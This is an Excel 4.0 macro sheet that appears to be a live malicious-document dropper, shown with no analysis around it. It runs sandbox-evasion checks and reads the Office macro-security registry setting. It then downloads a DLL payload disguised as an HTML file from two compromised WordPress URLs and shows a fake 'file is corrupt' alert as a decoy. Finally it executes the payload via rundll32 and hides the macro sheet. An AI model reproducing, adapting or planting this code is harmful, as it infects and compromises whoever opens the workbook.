=IF(GET.WORKSPACE(19),,CLOSE(TRUE)) =IF(GET.WORKSPACE(42),,CLOSE(TRUE)) =IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))),,CLOSE(TRUE)) =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe","EXPORT HKCU\Software\Microsoft\Office\"&GET.WORKSPACE(2)&"\Excel\Security c:\users\public\1.reg /y",0,5) =WAIT(0+"00:00:03") =FOPEN("c:\users\public\1.reg") =FPOS(R8,215) =FREAD(R8,255) =FCLOSE(R8) =FILE.DELETE("c:\users\public\1.reg") =IF(ISNUMBER(SEARCH("0001",R10)),CLOSE(FALSE),) =CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://assemble.sg/wp-frunt.php","c:\Users\Public\c6wga5ef.html",0,0) =IF(R15<0,CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://gartnerkvartalet.no/wp-content/themes/calliope/wp-front.php","c:\Users\Public\c6wga5ef.html",0,0),) =ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.",2) =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","c:\Users\Public\c6wga5ef.html,DllRegisterServer",0,5) =CLOSE(FALSE) =WORKBOOK.HIDE("LkahPm1nxt",TRUE)